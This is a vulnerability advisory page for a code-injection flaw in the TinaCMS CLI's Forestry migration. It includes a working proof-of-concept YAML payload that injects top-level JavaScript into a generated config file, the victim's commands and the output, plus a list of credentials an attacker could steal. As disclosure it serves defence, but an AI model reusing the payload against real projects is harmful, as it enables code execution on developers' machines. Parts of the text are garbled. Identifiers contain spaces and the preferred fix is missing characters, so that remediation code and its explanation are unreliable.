PT-2026-51059 · Npm · @Tinacms/Cli

Publicado

2026-06-19

·

Atualizado

2026-06-19

·

CVE-2026-54074

CVSS v3.1

7.8

Alta

VetorAV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Description

Summary

@tinacms/cli contains a Remote Code Execution vulnerability in its Forestry-to-Tina migration command. The internal helper addVariablesToCode unquotes any value matching the marker " TINA INTERNAL :::(.*?):::" inside the stringified collection JSON. User-supplied label and name fields from .forestry/**/*.yml are placed into that JSON without any sanitisation. An attacker who controls a Forestry-style project can therefore inject arbitrary JavaScript into the generated tina/templates.{ts,js} file. The injected code is written at module top level, so it executes the moment the developer runs tinacms dev or tinacms build, with the developer's privileges.

Details

Vulnerable code path:
  1. packages/@tinacms/cli/src/cmds/forestry-migrate/util/index.tstransformForestryFieldsToTinaFields() writes forestryField.label (and .name) straight into TinaField objects (no sanitisation).
  2. packages/@tinacms/cli/src/cmds/forestry-migrate/util/codeTransformer.ts, lines 16-22 — the regex-based unquoter:
ts
export const addVariablesToCode = (codeWithTinaPrefix: string) => {
 const code = codeWithTinaPrefix.replace(
  /" TINA INTERNAL :::(.*?):::"/g,
  '$1'
 );
 return { code };
};
  1. codeTransformer.ts lines 80-88 — the field array is JSON.stringify-ed and then handed to addVariablesToCode. Because JSON.stringify does not escape single quotes or backticks, an attacker who avoids " in the payload survives the JSON pass intact.
  2. packages/@tinacms/cli/src/cmds/init/apply.ts lines 110-116 — the resulting string is written to tina/templates.{ts,js} and imported by the generated tina/config.{ts,js}, which tinacms dev evaluates.
Why it executes immediately: the regex unquoting allows the attacker's payload to close the surrounding object/array and the enclosing xxxFields() function, drop a top-level IIFE, and then start a dummy function that swallows the trailing JSON. The IIFE is at module scope, so it runs the instant tina/config.ts imports ./templates.

PoC

End-to-end verified against tinacms and @tinacms/cli@2.3.1, built from commit ae1ab5d0f of tinacms/tinacms on Windows 11 + Node.js v24 (behaviour is identical on Node 22).
Step 1 — attacker prepares a malicious Forestry project
.forestry/settings.yml
yaml
---
new page extension: md
auto deploy: false
admin path: ''
webhook url: ''
sections:
- type: directory
 path: content/posts
 label: Posts
 create: all
 match: "**/*.md"
 templates:
 - rce
.forestry/front matter/templates/rce.yml
yaml
---
label: rce template
fields:
- name: title
 type: text
 label: " TINA INTERNAL :::1}] }; (function(){ const fs=require('fs'); const os=require('os'); fs.writeFileSync(require('path').join(os.tmpdir(),'PWNED PROOF.txt'), 'RCE triggered on ' + os.hostname() + ' at ' + new Date().toISOString()); console.log('=== RCE SUCCESSFUL ==='); })(); function ignore (){ return [{x:1:::"
Note on payload encoding. The original disclosure draft used double quotes inside the payload (console.log("RCE")). JSON.stringify escapes those to ", which makes the generated TypeScript syntactically invalid and is rejected by Prettier before the file is written. Using single quotes or backticks for the inner string literals is required for the exploit to succeed.
Step 2 — victim runs the standard onboarding flow
bash
git clone <attacker repo>
cd <attacker repo>
npx tinacms init    # accepts the "migrate Forestry templates?" prompt
npx tinacms dev    # OR: npx tinacms build
Step 3 — generated tina/templates.ts (verbatim, from a clean run)
ts
import type { TinaField } from "tinacms";
export function rce templateFields() {
 return [{ type: "string", name: "title", label: 1 }];
}
(function () {                     // <-- TOP-LEVEL IIFE
 const fs = require("fs");
 const os = require("os");
 fs.writeFileSync(
  require("path").join(os.tmpdir(), "PWNED PROOF.txt"),
  "RCE triggered on " + os.hostname() + " at " + new Date().toISOString()
 );
 console.log("=== RCE SUCCESSFUL ===");
})();
function ignore () {
 return [{ x: 1 }] as TinaField[];
}
Step 4 — observed result
$ npx tinacms dev --noTelemetry --no-server
🦙 TinaCMS Dev Server is initializing...
=== RCE SUCCESSFUL ===
Cannot read properties of undefined (reading 'publicFolder')

$ cat "$TEMP/PWNED PROOF.txt"
RCE triggered on <hostname> at 2026-05-23T06:57:29.800Z
The === RCE SUCCESSFUL === line is printed before the dev server fails on the (intentionally minimal) config, proving the malicious code executed during config evaluation.

Impact

  • Class: Remote Code Execution (code injection into a generated source file that is automatically executed by the dev server/build).
  • Attack vector: Any developer who runs tinacms init on a Forestry project they did not author (e.g. a starter template, a community fork, a "convert my site to Tina" service, an evaluation of a third-party CMS migration) and then runs tinacms dev or tinacms build.
  • Privileges obtained: Full execution under the developer's user account. Practical consequences include:
  • Exfiltration of environment variables, .env files, SSH keys, ~/.aws/credentials, ~/.npmrc tokens, ~/.config/gh/hosts.yml.
  • Source-code modification (planting backdoors before the developer's next commit / publish).
  • Supply-chain abuse via the developer's npm publish and git push credentials.
  • Persistence via shell rc files or scheduled tasks.
  • Authentication: None required from the attacker.
  • User interaction: Required — victim must run the migration and then the dev/build command. The migration prompt defaults to "yes".

Suggested Remediation

Either fix is sufficient; Option B is preferred because it is structurally impossible to bypass and does not silently drop user content.

Option A — sanitise user-controlled strings (the disclosure draft's proposal)

ts
// packages/@tinacms/cli/src/cmds/forestry-migrate/util/index.ts
const sanitizeString = (str: unknown): unknown =>
 typeof str === 'string'
  ? str.replace(/ TINA INTERNAL :::/g, '')
  : str;
Apply to every user-controlled string that flows into a TinaField object — at minimum forestryField.label, forestryField.name, forestryField.template, forestryField.config.options[*], forestryField.config.source.section, and the equivalents on nested fields/template types recursive paths.

Option B — change the marker to a sequence that cannot survive JSON.stringify of user data

ts
// codeTransformer.ts
const MARKER OPEN = ' TINA INTERNAL ';
const MARKER CLOSE = '/ TINA INTERNAL ';

export const addVariablesToCode = (s: string) => ({
 code: s.replace(
  new RegExp(`"${MARKER OPEN}(.*?)${MARKER CLOSE}"`, 'g'),
  '$1'
 ),
});
JSON.stringify escapes  to the six-character sequence , so any literal control character supplied via YAML can never reconstruct the marker. The internal callers (makeFieldsWithInternalCode) keep emitting real  bytes, so the legitimate flow continues to work and no user content is silently mutated.

Defence-in-depth

Regardless of which option ships, the migration code should also:
  • Reject forestryField.label / .name that contain newlines or NUL bytes (Forestry never produced them).
  • Wrap the eventual prettier.format(...) call so that if formatting fails the build aborts (today an exception is propagated, which is good — keep it that way).

Credit

Reported by AnGrY-Althaf (angry.althaf@gmail.com).
End-to-end PoC executed locally against tinacms@2.3.1 / @tinacms/cli@2.3.1 built from commit ae1ab5d0f of https://github.com/tinacms/tinacms.

Correção

Code Injection

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Enumeração de Fraquezas

Identificadores relacionados

CVE-2026-54074
GHSA-4936-9HRH-QQPW

Produtos afetados

@Tinacms/Cli